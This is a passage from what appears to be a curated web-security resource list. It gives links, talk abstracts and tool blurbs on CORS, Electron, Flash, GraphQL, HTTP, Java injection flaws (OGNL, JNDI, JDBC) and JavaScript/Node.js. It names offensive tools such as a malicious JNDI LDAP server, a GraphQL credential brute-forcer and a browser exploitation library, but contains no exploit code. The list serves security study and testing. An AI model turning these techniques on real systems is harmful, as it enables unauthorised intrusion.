- Cross-Origin Resource Sharing (CORS) is a complex and commonly misunderstood concept that is often implemented wrong for the right reasons. In this talk we will explain the Same-Origin Policy (SOP) and CORS in an easy to understand way. We will then discuss poor implementations of CORS and the resulting issues. We'll continue by releasing research done on a number of development frameworks exposing poorly designed CORS libraries that default to the most dangerous behavior. We'll then demonstrate why all of this matters by conducting a distributed attack against the most common CORS configuration using audience participation and a new tool. Finally, we'll discuss the safest ways to implement CORS. The custom tools used during the talk will be released along with the presentation.
- Of CORS it's Exploitable! What's Possible with Cross-Origin Resource Sharing? - Rebecca Deck(CircleCityCon2019)
- Cross-origin resource sharing (CORS) is extremely common on modern web apps, but scanning tools are terrible at analyzing CORS policy. If testers really understand CORS policy, a damaging exploit is often not far away. Is it possible to force a user to do something significant? Does using a GUID offer any protection? Does the authentication mechanism really protect against cross-origin attacks? Is it really risky to allow all origins? Do pre-flight requests always help? CORS requests get tricky very quickly and scanning tools do not have a good understanding of the intricacies that surface during actual application testing. A quick and dirty JavaScript exploit will put the issue to rest and eliminate hours of theoretical debate. This presentation covers how CORS works and how to find misconfigurations. Dozens of actual applications are distilled into examples demonstrate CORS protections and JavaScript code to bypass them. A basic knowledge of CORS and JavaScript will be helpful to understand the exploit code, but no special background is necessary to grasp the basics of CORS configuration.
- Papers
- Request and Conquer: Exposing Cross-Origin Resource Size - Tom Van Goethem, Mathy Vanhoef, Frank Piessens, Wouter Joosen(2016)
- In this paper, we explore various techniques that can be employed to reveal the size of resources. As a result of this in-depth analysis, we discover several design flaws in the storage mechanisms of browsers, which allows an adversary to expose the exact size of any resource in mere seconds. Furthermore, we report on a novel size-exposing technique against Wi-Fi networks. We evaluate the severity of our attacks, and show their worrying consequences in multiple real-world attack scenarios. Furthermore, we propose an improved design for browser storage, and explore other viable solutions that can thwart size-exposing attacks.
- Cross-Origin Read Blocking (CORB) - Google
- This document outlines Cross-Origin Read Blocking (CORB), an algorithm by which dubious cross-origin resource loads may be identified and blocked by web browsers before they reach the web page. CORB reduces the risk of leaking sensitive data by keeping it further from cross-origin web pages. In most browsers, it keeps such data out of untrusted script execution contexts. In browsers with Site Isolation, it can keep such data out of untrusted renderer processes entirely, helping even against side channel attacks.
- Tools
- CORStest
- A simple CORS misconfiguration scanner
- CORS Exploitation Framework(CEF)
- A proof-of-concept tool for conducting distributed exploitation of permissive CORS configurations.
- Corsy
- Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations.
- CorsMe
- A cors misconfiguration scanner tool based on golang with speed and precision in mind!
- Miscellaneous
- Arbitrary Reflected Origin
- ejj.io/misconfigured-Cors https://gist.github.com/ejcx/74c7d7727767ca3aafa6
- Cross-Origin-Read-Blocking
- Cross-Origin Read Blocking (CORB) - Google
- This document outlines Cross-Origin Read Blocking (CORB), an algorithm by which dubious cross-origin resource loads may be identified and blocked by web browsers before they reach the web page. CORB reduces the risk of leaking sensitive data by keeping it further from cross-origin web pages. In most browsers, it keeps such data out of untrusted script execution contexts. In browsers with Site Isolation, it can keep such data out of untrusted renderer processes entirely, helping even against side channel attacks.
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Talks & Presentations
- Securing the DOM from the Bottom Up - Mike Samuel(BSides Cleveland2019)
- 18 years have passed since Cross-Site Scripting (XSS) became the single most common security problem in web applications. Since then, numerous efforts have been proposed to detect, fix or mitigate it, but these piecemeal efforts have not combined to make it easy to produce XSS-free code. This talk explains how Google's security team has achieved a high-level of safety against XSS and related problems by integrating tools to make it easier for developers to produce secure software than vulnerable, and to bound the portion of a codebase that could contribute to a vulnerability. We will show how this works in practice and end with advice on how to achieve the same results on widely-used, open-source stacks and new browser mechanisms that will make it much easier to achieve high-levels of security with good developer experience.
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- How the Document Object Model Works in JavaScript – DOM Tutorial for Beginners - Dickson Boateng(2023)
- Beyond XSS: Edge Side Include Injection - Louis Dion-Marcil(2018)
- ESI Injection Part 2: Abusing specific implementations - Philippe Arteau(2019)
- Exploring the World of ESI Injection - Sudhanshu Rajbhar(2022)
- Talks & Presentations
- 101
- Electron.js
- Electron (software framework) - Wikipedia
- Electron(code)
- Pentesting Electron Applications 101 -
- awesome-electronjs-hacking
- "A curated list of awesome resources about Electron.js (in)security"
- Articles/Blogposts/Writeups
- no-sandbox
- No Sandbox - Applications That Run Chromium and Chrome Without The Sandbox. TL;DR exploits in these browser based applications are already sandboxed escaped: https://no-sandbox.io/
- From Markdown to RCE in Atom
- As It Stands - Electron Security - 2016
- As It Stands - Update on Electron Security - 2016
- Modern Alchemy: Turning XSS into RCE
- Build cross platform desktop XSS, it’s easier than you think by Yosuke Hasegawa - CodeBlue16
- Modern Alchemy: Turning XSS into RCE - doyensec
- From Markdown to RCE in Atom - statuscode.ch
- Instrumenting Electron Apps for Security Testing - Paolo Stagno
- Signature Validation Bypass Leading to RCE In Electron-Updater - Lorenzo Stella(2020)
- The App Sandbox - Charlie Hess(Slack2020)
- Discord Desktop app RCE - Masato Kinugawa(2020)
- Electron APIs Misuse: An Attacker’s First Choice - Luca Carettoni, Lorenzo Stella(2021)
- Getting Started with Pentesting Electron Applications - cornerpirate(2021)
- Attack Surface Analysis - Part 1 - Application Update: 'A Novel Way to Bypass Executable Signature Checks with Electron' - Parsia(2021)
- Discord Desktop - Remote Code Execution - s1r1us(2021)
- Visual Studio Code Jupyter Notebook RCE - Luca Carettoni(2022)
- Quasar: Compromising Electron Apps - Michael Taggart(2022)
- 1-click RCE in Electron Applications - sharbarkin
- Multiple ways to break Electron applications -Kevin(Mizu)(2022)
- Diving Into Electron Web API Permissions - Robert Dick(2022)
- Security Review for Electron JS applications
- "The CodeAllTheThings is a list of threat sinks used in the manual security source code review for application security."
- electron-research
- Documentation
- Papers
- Talks & Presentations
- MarkDoom: How I Hacked Every Major IDE in 2 Weeks - Matt Austin, LevelUp 2017
- Electron - Build cross platform desktop XSS, it’s easier than you think by Yosuke Hasegawa - [CB16]
- Electronegativity - A Study of Electron Security - Carettoni(2017)
- Electron Security Checklist - A guide for developers and auditors - Luca Carettoni(2017)
- App.SetAsDefaultRCEClient - Juho Nurminen(Disobey2020)
- We detail three different approaches for exploiting Windows scheme handlers — two of them application-specific and one applicable to Electron apps more generally — and show how Windows Universal Naming Convention can present a significant risk for command injection. We also demonstrate a small tool for exploiting the Chrome DevTools protocol. While most of the issues discussed in this talk have already been mitigated on several levels, the Electron team has failed to publicly document which versions of the framework are vulnerable. And while Electron's new tightened release cycle means that vulnerable versions have already reached EOL, when developers are unaware that a vulnerability exists, there is little incentive to upgrade. With this talk, we aim to fix that lack of incentive. In addition to the technical details of the seven vulnerabilities, we provide insight into the disclosure process itself, the various types of programs intended to facilitate it, and their shortcomings. In particular we present our experiences with Zero Day Initiative, who acquire high-impact vulnerabilities, and Mattermost, one of the affected vendors running a responsible disclosure program.
- Published Exploits
- Tools
- electron-run-shell-example
- An HTML5 stand-alone app using GitHub Electron (Chrome engine + Node.js) -- this is a GUI wrapper example that runs a bash shell command and processes its output.
- Electronegativity
- Electronegativity is a tool to identify misconfigurations and security anti-patterns in Electron-based applications.
- 101
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- Tools
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations
- Internal Affairs: Hacking File System Access from the Web - Matthew Weeks(BHUSA2021)
- Slides
- The File System Access API deployed to browsers this year is the current version of a W3C draft to give websites, with user approval, the ability to read, write, and edit files and folders the user selects on their devices, an outgrowth of an earlier proposal called Native File System. It has been released and deployed in many Chromium-based browsers. Despite a number of security features implemented in the API, this presentation will show several ways in which a hostile website may gain arbitrary code execution and slip malicious code past operating system and security product scans, or even detailed, manual inspection.
- Articles/Blogposts/Writeups
- Testing for Cross-Site-Flashing - OWASP - https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OTG-CLIENT-008)
- Security Domains, Application Domains, and More in ActionScript 3.0
- The old is new, again. CVE-2011-2461 is back!
- As a part of an ongoing investigation on Adobe Flash SOP bypass techniques, we identified a vulnerability affecting old releases of the Adobe Flex SDK compiler. Further investigation traced the issue back to a well known vulnerability (CVE-2011-2461), already patched by Adobe. Old vulnerability, let's move on? Not this time. CVE-2011-2461 is a very interesting bug. As long as the SWF file was compiled with a vulnerable Flex SDK, attackers can still use this vulnerability against the latest web browsers and Flash plugin. Even with the most recent updates, vulnerable Flex applications hosted on your domain can be exploited. In this presentation, we will disclose the details of this vulnerability (Adobe has never released all technicalities) and we will discuss how we conducted a large scale analysis on popular websites, resulting in the identification of numerous Alexa Top 50 sites vulnerable to this bug. Finally, we will also release a custom tool and a Burp plugin capable of detecting vulnerable SWF applications.
- Advanced Flash Vulnerabilities in Youtube Writeups Series
- Decode Adobe Flex AMF protocol
- Finding XSS vulnerabilities in flash files.
- XSS and CSRF via SWF Applets (SWFUpload, Plupload)
- WordPress Flash XSS in flashmediaelement.swf - cure53
- Security Domains, Application Domains, and More in ActionScript 3.0 - senocular
- Testing for Cross site flashing (OTG-CLIENT-008) - OWASP
- XSS and CSRF via SWF Applets (SWFUpload, Plupload) - Neal Poole
- Getting started with AMF Flash Application Penetration Testing ! - nerdint
- RIA
- Analyzing the Crossdomain Policies of Flash Applications - Dongseok Jang, Aishwarya Venkataraman, G. Michael Sawka, Hovav Shacham(2011)
- Adobe: “Cross-domain policy file usage recommendations for Flash Player” - http://www.adobe.com/devnet/flashplayer/articles/cross_domain_policy.html
- Oracle: “Cross-Domain XML Support” - http://www.oracle.com/technetwork/java/javase/plugin2-142482.html#CROSSDOMAINXML
- MSDN: “Making a Service Available Across Domain Boundaries” - http://msdn.microsoft.com/en-us/library/cc197955(v=vs.95).aspx
- MSDN: “Network Security Access Restrictions in Silverlight” - http://msdn.microsoft.com/en-us/library/cc645032(v=vs.95).aspx
- Stefan Esser: “Poking new holes with Flash Crossdomain Policy Files” - http://www.hardened-php.net/library/poking_new_holes_with_flash_crossdomain_policy_files.html
- Jeremiah Grossman: “Crossdomain.xml Invites Cross-site Mayhem” - http://jeremiahgrossman.blogspot.com/2008/05/crossdomainxml-invites-cross-site.html
- Google Doctype: “Introduction to Flash security” - http://code.google.com/p/doctype-mirror/wiki/ArticleFlashSecurity - https://www.youtube.com/watch?v=RNt_e0WR1sc
- Securing
- HardenFlash
- Patching Flash binary to stop Flash exploits and zero-days
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- 101
- Introduction to GraphQL - GraphQL.org
- Queries and Mutations - GraphQL.org
- Introspection - GraphQL.org
- HowToGraphQL.com
- Security Points to Consider Before Implementing GraphQL - Kristopher Sandoval(2017)
- Why and how to disable introspection query for GraphQL APIs - wallarm(2019)
- GraphQL Cheat Sheet - OWASP
- A Facebook GraphQL crash course - PHWD
- Introducing the Apollo GraphQL data stack - ApolloGraphQL
- The GraphQL stack: How everything fits together - Sashko Stubailo
- Articles/Blogposts/Writeups
- GraphQL - Hacktricks
- poc-graphql
- Research on GraphQL from an AppSec point of view.
- GraphQL - Mahmoud M. Awali
- GraphQL Batching Attack - wallarm(2019)
- Practical GraphQL attack vectors - jondow.eu
- A Hacker’s Guide to the Shopify GraphQL API 🚀
- Looting GraphQL Endpoints for Fun and Profit - @theRaz0r(2017)
- GraphQL - Security Overview and Testing Tips - Paolo Stagno(2018)
- GraphQL vs REST API model, common security test cases for GraphQL endpoints - just_a_noob(2019)
- How to exploit GraphQL endpoint: introspection, query, mutations & tools - YesWeHack
- The 5 Most Common GraphQL Security Vulnerabilities - Aidan Noll(2020)
- GraphQL path enumeration for better permission testing - deesee.xyz(2020)
- That single GraphQL issue that you keep missing - Tomasz Swiadek, Andrea Brancaleoni(2021)
- Hacking GraphQL for Fun and Profit (1) - Understanding GraphQL Basics - busk3r(2021)
- Hacking GraphQL for Fun and Profit (2): Methodology & Examples - busk3r(2021)
- Exploiting GraphQL - Shubham Shah(2021)
- Practical GraphQL attack vectors - Sebastian Mihalache(2021)
- A Primer for Testing the Security of GraphQL APIs - Alex Leahu(2021)
- Lessons Learned While Pentesting GraphQL - Sean Verity(2022)
- GraphQL exploitation – All you need to know - Theodoros Danos(2023)
- Securing
- Talks/Presentations/Videos
- An Attackers View of Serverless and GraphQL Apps - Abhay Bhargav(AppSecCali2019)
- This talk presents a red-team perspective of the various ways in which testers can discover and exploit serverless and/or GraphQL driven applications to compromise sensitive information, and gain a deeper foothold into database services, IAM services and other cloud components. The talk will have some demos that will demonstrate practical attacks and attack possibilities against Serverless and GraphQL applications.
- REST in Peace: Abusing GraphQL to Attack Underlying Infrastructure - Matthew Szymanski(Derbycon2019)
- BugCrowd LevelUp0x5 Version of the talk
- GraphQL is a query language for APIs set to replace RESTful architecture. The use of this technology has achieved rapid adoption and is now leveraged by companies such as GitHub, Credit Karma, and PayPal. Companies such as Hacker One and New Relic have suffered from critical vulnerabilities hidden within GraphQL endpoints. In this talk we will learn enough about GraphQL to be dangerous. Demonstrate how to use the technology's intricacies against itself while taking advantage of implementation errors and misconfigurations. Examine GraphQL specific attacks as well as tried and true techniques adapted to fit into the GraphQL context. Then walk through how to carry out these attacks efficiently and effectively, introducing a tool to help automate and streamline the process.
- Introduction To GraphQL | Penetration Test - CyberSecurityTV(2020)
- "GraphQL is an API standard such as REST and SOAP. It is a modern query language which is being used by a number of applications. In this episode we have discussed different attacks on GraphQL such as Introspection query, Broken Access Control, DoS attack, Injection etc. as well as prevention. Hope this helps you to become better testers."
- Finding Your Next Bug: GraphQL - InsiderPHD(2020)
- GraphQL is becoming the next big API technology for developers, but with new technology comes new risk, and for us that means bounties! In this video, I cover everything GraphQL, from how it works to what kind of bugs are common. Next time we're going to expand on this and I'll show you how to do this live!
- Attacking GraphQL's Auto-Correct - Somdev Sangwan(Null Ahmedabad 2021)
- Damn GraphQL - Defending and Attacking APIs - Dolev Farhi(BSides Vancouver 2021)
- With the uprising of GraphQL as a technology, a query language made by Facebook, security professionals must be ready for the day GraphQL hits their company’s networks. In this talk, we will walk through GraphQL basics, followed by a deep dive into the various GraphQL attack vectors, from Information Gathering to Denial of Service and Injections. Additionally, we will discuss a recent security platform release - Damn Vulnerable GraphQL Application (DVGA), a platform made for security practitioners to learn GraphQL and its various weaknesses in a safe testing environment.
- Tools
- graphql-api-monitor
- GraphQL - Demo Vulnerable API
- A simple GraphQL API demonstrating several common vulnerabilities.
- GraphQL Voyager
- Represent any GraphQL API as an interactive graph. It's time to finally see the graph behind GraphQL.
- inql
- A security testing tool to facilitate GraphQL technology security auditing efforts. Can be used as a script or burpsuite extension.
- graphql-path-enum
- Blogpost
- Tool that lists the different ways of reaching a given type in a GraphQL schema.
- Altair GraphQL Client
- graphw00f
- graphw00f (inspired by wafw00f) is the GraphQL fingerprinting tool for GQL endpoints: it sends a mix of benign and malformed queries to determine the GraphQL engine running behind the scenes. graphw00f will provide insights into what security defences each technology provides out of the box, and whether they are on or off by default. Specially crafted queries cause different GraphQL server implementations to respond uniquely to queries, mutations and subscriptions; this makes it trivial to fingerprint the backend engine and distinguish between the various GraphQL implementations.
- BatchQL
- GraphQL security auditing script with a focus on performing batch GraphQL queries and mutations
- GraphQL IDE
- An extensive IDE for exploring GraphQL API's
- GraphQL Cop
- GraphQL Cop is a small Python utility to run common security tests against GraphQL APIs. GraphQL Cop is perfect for running CI/CD checks in GraphQL. It is lightweight, and covers interesting security issues in GraphQL.
- GraphQL Threat Matrix
- GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
- inql
- A security testing tool to facilitate GraphQL technology security auditing efforts. InQL can be used as a stand-alone script or as a Burp Suite extension.
- CrackQL
- "CrackQL is a versatile GraphQL penetration testing tool that exploits poor rate-limit and cost analysis controls to brute-force credentials and fuzz operations."
- Graphicator
- Graphicator is a GraphQL "scraper" / extractor. The tool iterates over the introspection document returned by the targeted GraphQL endpoint, and then re-structures the schema in an internal form so it can re-create the supported queries. Once such queries are created, it uses them to send requests to the endpoint and saves the returned response to a file. Erroneous responses are not saved. By default the tool caches the correct responses and also caches the errors, thus when re-running the tool it won't go into the same queries again.
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Fetch Standard
- Fetch Living Standard — 2019/7/16 - whatwg
- The Fetch standard defines requests, responses, and the process that binds them: fetching.
- 101
- RFC 2068: Hypertext Transfer Protocol -- HTTP/1.1
- RFC 2616: Hypertext Transfer Protocol -- HTTP/1.1
- http-decision-diagram
- An activity diagram to describe the resolution of HTTP response status codes, given various headers, implemented via semantical callbacks.
- Basics of HTTP - MDN WebDocs
- An Overview of HTTP - MDN WebDocs
- Robots.txt
- The HTTP crash course nobody asked for - fasterthanlime(2022)
- HTTP Tools
- curl
- command line tool and library for transferring data with URLs (since 1998)
- Everything curl - the book
- HTTPWTF - Tim Perry(2020)
- Hurl
- Hurl is a command line tool that runs HTTP requests defined in a simple plain text format. It can chain requests, capture values and evaluate queries on headers and body response. Hurl is very versatile: it can be used for fetching data, testing HTTP sessions and testing XML / JSON APIs.
- Caching
- RFC 7234: Hypertext Transfer Protocol (HTTP/1.1): Caching
- The Hypertext Transfer Protocol (HTTP) is a stateless application-level protocol for distributed, collaborative, hypertext information systems. This document defines HTTP caches and the associated header fields that control cache behavior or indicate cacheable response messages.
- Browser Caching Checker - GiftOfSpeed
- Cache-Control Recommendations - April King(2021)
- Cache Me If You Can: Exposing your application using caching features - Philippe Arteau(2019)
- Certificates
- HTTP Headers
- 101
- 'Security' Headers
- User-Agents
- 101
- Tools
- Security Analyser User Agents
- We've got 141 Security Analyser User Agents in our database. This is a listing of them.
- Injection of
- X-Forwarded-For
- X-Forwarded-For Header - Chad Duffey(2020)
- The perils of the “real” client IP - adam p(2022)
- HTTP Methods
- HTTP Objects
- HTTP Parameters
- HTTP Pipelining
- 101
- Articles/Blogposts/Writeups
- HTTP Signatures
- HTTP Verbs
- Syntax & Routing
- RFC 7230: Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing
- The Hypertext Transfer Protocol (HTTP) is a stateless application-level protocol for distributed, collaborative, hypertext information systems. This document provides an overview of HTTP architecture and its associated terminology, defines the "http" and "https" Uniform Resource Identifier (URI) schemes, defines the HTTP/1.1 message syntax and parsing requirements, and describes related security concerns for implementations.
- HTTP2
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- HTTP/2 & QUIC - Teaching Good Protocols To Do Bad Things - Catherine (Kate) Pierce, Vyrus(PHV-Defcon2016)
- The meteoric rise of SPDY, HTTP/2, and QUIC has gone largely unremarked upon by most of the security field. QUIC is an application-layer UDP-based protocol that multiplexes connections between endpoints at the application level, rather than the kernel level. HTTP/2 (H2) is a successor to SPDY, and multiplexes different HTTP streams within a single connection. More than 10% of the top 1 Million websites are already using some of these technologies, including much of the 10 highest traffic sites. Whether you multiplex out across connections with QUIC, or multiplex into fewer connections with HTTP/2, the world has changed. We have a strong sensation of Déjà vu with this work and our 2014 Black Hat USA MPTCP research. We find ourselves discussing a similar situation in new protocols with technology stacks evolving faster than ever before, and Network Security is largely unaware of the peril already upon it. This talk briefly introduces QUIC and HTTP/2, covers multiplexing attacks beyond MPTCP, discusses how you can use these techniques over QUIC and within HTTP/2, and discusses how to make sense of and defend against H2/QUIC traffic on your network. We will also demonstrate, and release, some tools with these techniques incorporated.
- HTTP3
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- HTTP Parameter Pollution
- 101
- HTTP Parameter Pollution - Imperva
- HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft an HTTP request in order to manipulate or retrieve hidden information. This evasion technique is based on splitting an attack vector between multiple instances of a parameter with the same name. Since none of the relevant HTTP RFCs define the semantics of HTTP parameter manipulation, each web application delivery platform may deal with it differently. In particular, some environments process such requests by concatenating the values taken from all instances of a parameter name within the request. This behavior is abused by the attacker in order to bypass pattern-based security mechanisms.
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- Apache Struts & OGNL
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution
- OGNL Injection Decoded - SecOps Group
- OGNL Apache Struts exploit: Weaponizing a sandbox bypass (CVE-2018-11776) - Man Yue Mo(2018)
- Exploiting Struts RCE on 2.5.26 - Chris McCown(2021)
- Bypassing OGNL sandboxes for fun and charities - Alvaro Munoz(2023)
- JDBC
- Presentations
- Make JDBC Attacks Brilliant Again - Xu Yuanzhen & Chen Hongkun(HITBSI2021)
- Slides
- Other Slides
- In this presentation, we will share our latest research into attacking JDBC. We will start with the derivation of JDBC attacks including the JDBC concept and root cause of vulnerability. We will then give a more in-depth analysis of occurred implementations including the 0day we found (Weblogic RCE). Finally we will share some new ways of exploiting JDBC including XXE and RCE issues – we will also disclose some 0day vulnerabilities in DB2, JBoss Wildfly, ModeShape.
- Java Server Faces (JSF)
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- JNDI
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations
- Tools
- dnsAutoRebinding
- Rogue JNDI
- A malicious LDAP server for JNDI injection attacks
- JNDI-Injection-Exploit
- JNDI injection testing tool (a tool which generates JNDI links and can start several servers to exploit JNDI injection vulnerabilities, like Jackson, Fastjson, etc.)
- Java Server Pages (JSP)
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Hibernate
- Exploiting Hibernate Injections - Johannes Moritz(2020)
- Hibernate is one of the most commonly found database libraries used in Java web applications, shipping with its own query language. This technical post will teach you how to detect and exploit Hibernate's very own vulnerability: the HQL Injection.
- RMI
- 101
- Articles/Blogposts/Writeups
- Tools
- General
- Training
- 101
- Articles/Blogposts/Writeups
- Static Analysis of Client-Side JavaScript for pen testers and bug bounty hunters - Bharath
- A Brief History of JavaScript - Sebastian Peyrott(2017)
- Javascript for bug bounty hunters(part 1) — Ahmed Ezzat (BitTheByte)
- [Hacker101: JavaScript for Hackers - @STOKfredrik, tomnomnom(2020)](https://www.youtube.com/watch?v=FTeE3OrTNoA)
- Real World JavaScript Security by Amanvir Sangha(Devoxx2019)
- This talk covers prevalent but not well known security issues in modern full stack JavaScript applications found in real-world assessments. We will also discuss strategies on avoiding security issues and secure design patterns that can be adopted to write robust and secure JavaScript applications. We cover less well-known issues such as insecure object comparisons and prototype pollution along with how they can be used to exploit applications in Node.js. In addition, the talk also covers new upcoming security standards and protections to protect client-side JavaScript code (TrustedTypes).
- JavaScript Code Review Guide for Bug Bounty Hunters - MikeChan(2021)
- Talks/Presentations/Videos
- [An Infosec Timeline: Noteworthy Events From 1970 To 2050 - Mario Heiderich(OWASP AppSec AMS)](https://www.youtube.com/watch?v=u3x_0955_TU&feature=youtu.be)
- Free Tools! How to Use Developer Tools and Javascript in Webapp Pentests - BHIS(2020)
- I like webapps, don't you? Webapps have got to be the best way to learn about security. Why? Because they're self-contained and so very transparent. You don't need a big ol' lab before you can play with them. You can run them in a single tiny VM or even tiny-er Docker image on your laptop. And so long as you're attacking your own stuff, it's easy to stay out of trouble. You're up and running in the time it takes for a single download. And the transparent part? Ever since "view source" in the earliest web browsers, it's been easy to see exactly what's going on in a webapp and in the browser. Every webapp you ever use has no choice but to give you the (client-side) source code! It's almost like there's no such thing as a "black box" webapp pentest, if you think about it... Anyhow - the Developer Tools in Firefox (and Chrome) are what happens when you take "view source" and add 25 years or so of creativity and power. We'll look at the Developer Tools in the latest Firefox with a pentester's eye. Inspect and change the DOM (Document Object Model), take screenshots, find and extract key bits of data, use the console to run Javascript in the site's origin context and even pause script execution in the debugger if things go too fast... Maybe we'll convince you that you can realistically do a big chunk of a webapp pentest without ever leaving the browser.
- Offensive Javascript Techniques for Red Teamers - Dylan Ayrey, Christian Frichot(BSidesSF2021)
- AppSec is often very heavily focused on pre-exploitation. Frameworks like BeEF break this norm a little and can be used as tools to move laterally from the browser, to implant malware on adjacent machines. Unfortunately, performing network reconnaissance with JavaScript becomes tricky if the victim doesn't keep the tab open for long. This presentation will discuss relatively new techniques and features of JavaScript that have made it easier for sophisticated threat actors to craft JavaScript payloads that target internal network vulnerabilities, as fast as a person can think to close a tab. We'll also show new reconnaissance techniques traditionally used by red teams, post-malware implant, that can be used to get a foothold onto a network from a browser, pre-malware implant. We'll also show some real examples of this, crafting external payloads that target internal assets at large companies, and we'll show how responsible disclosure for intranet facing bugs typically gets resolved.
- JavaScript Obfuscation: It's All About the P-a-c-k-e-r-s — Or Katz(InfosecInTheCity2022)
- In this presentation I will present a lazy, performance cost-effective approach, focusing on the detection of JavaScript packer templates. Once combined with threat intelligence heuristics, this approach can predict the maliciousness level of JavaScript with a high probability of accuracy.
- Debugging
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Cold War with Javascript - Sameer Bhatt(2020)
- "Now every financial sector applications i.e. mobile or web, use one more security layer which is encryption mechanism so the attacker who able to intercept the traffic through any MITM tools can not able to understand the request data. When we do pen-testing we follow some methodology, we have to test each and every parameter and request. well as we all know attackers don't follow any rules or regulations, when they want to attack they will find the way to do it. So as keeping the mindset of the attacker, we will understand this kind of encryption mechanism, what developer thinks when they implement this? also what kind of mistakes they do? why they feel putting encryption means the application is secure? what makes them think that no one can break there logic? so they hide sensitive information behind the encryption. So keeping all the above maybe some more cases in my mind, I prepared my own ""Debugging methodology"" for this, which I follow when I face this kind of scenario."
- JS Polyglots
- Source Maps
- Reverse-Engineering
- Advanced JS Deobfuscation Via AST and Partial Evaluation (Google Talk WrapUp) - Stefano Di Paola(2015)
- JavaScript AntiDebugging Tricks - x-c3ll(2020)
- Reverse engineering obfuscated JavaScript - PopUnder Chrome 59 - LiveOverflow
- Reverse engineering PopUnder trick for Chrome 60 - LiveOverflow
- Custom Chromium Build to Reverse Engineer Pop-Under Trick - LiveOverflow
- [Live] Reverse Engineering new PopUnder for Chrome 63 on Windows - LiveOverflow
- Javascript Anti Debugging — Some Next Level Sh*t (Part 1 — Abusing SourceMappingURL) - Gal Weizman(2019)
- JavaScript tampering – detection and stealth - adtechmadness(2019)
- Tools
- JSFuck
- JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
- JSDetox
- JSDetox is a tool to support the manual analysis of malicious Javascript code.
- Dom Flow - Untangling The DOM For More Easy-Juicy Bugs - BH USA 2015
- Javascript Deobfuscator - kahusecurity
- Revelo - kahusecurity
- pwn.js
- A Javascript library for browser exploitation
- Retire.js
- There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies development, but we need to stay up to date on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect use of versions with known vulnerabilities.
- General
- Articles/Blogposts/Writeups
- JavaScript Template Attacks
- At Home Among Strangers: Bo0oM(2019)
- Bypassing the IP whitelists of some web applications due to incorrect parsing of HTTP request headers.
- Talks/Presentations/Videos
- Articles/Blogposts/Writeups
- Angular
- Articles/Blogposts/Writeups
- Tools
- ngrev
- Graphical tool for reverse engineering of Angular projects. It allows you to navigate in the structure of your application and observe the relationship between the different modules, providers, and directives. The tool performs static code analysis which means that you don't have to run your application in order to use it.
- Backbone.js
- Django
- Be careful what you request for: Injection using the HTTP verb in Django - Grayson Hardaway(2020)
- The Fall Of Mighty Django, Exploiting Unicode Case Transformations - 0xsha(2020)
- Disclosing information with a side-channel in Django - Dennis Brinkrolf(2022)
- Ember.js
- Groovy
- H2
- GWT
- GWTMap - Reverse Engineering Google Web Toolkit Applications - Oliver Simonnet(2020)
- GWTMap
- GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications. The purpose of this tool is to facilitate the extraction of any service method endpoints buried within a modern GWT application's obfuscated client-side code, and to attempt to generate example GWT-RPC request payloads to interact with them.
- MeteorJS
- mustache.js
- mustache-security(2013)
- This place will host a collection of security tips and tricks for JavaScript MVC frameworks and templating libraries.
- Wikis
- NodeJS
- 101
- Educational
- A Roadmap for Node.js Security
- NodeGoat
- Being lightweight, fast, and scalable, Node.js is becoming a widely adopted platform for developing web applications. This project provides an environment to learn how OWASP Top 10 security risks apply to web applications developed using Node.js and how to effectively address them.
- Articles/Blogposts/Writeups
- Presentations/Talks/Videos
- NodeJS: Remote Code Execution as a Service - Peabnuts123 – Kiwicon 2016
- It's Coming From Inside the House: An Inside-Out Approach to NodeJS Application Security - Yolonda Smith(CircleCityCon2019)
- Getting application security right often requires that developers have a deeper than average understanding of the security domain. In what other industry is this the case? We don't have to be M.D.s to get a medical diagnosis; we don't have to be auto mechanics to get our cars fixed, yet we in security wag our fingers at "iD10t errors" and build grand mousetraps to catch "so obvious" developer missteps, when they may not know what they need to add, change or remove from their applications to make it "secure" in the first place. Furthermore, patterns to address these issues don't always fit the requirements of the application short or long term, resulting in solutions that only address part of the problem, or worse, are omitted altogether because they are too cumbersome to implement. My answer to this is _spartan - a node application created for developers of node.js applications, not security people. _spartan allows developers to create security policies which address their node app's (whether it be Desktop, Web, Mobile, IoT or API) specific requirements; it installs & configures the modules to match the policy; and it generates the boilerplate code that developers can import directly into their applications.
- Tools
- faker.js
- generate massive amounts of fake data in Node.js and the browser
- Hidden Property Abuse
- Discovering Hidden Properties to Attack Node js Ecosystem - Feng Xiao(DEFCON Safemode)
- BlackHat Slides
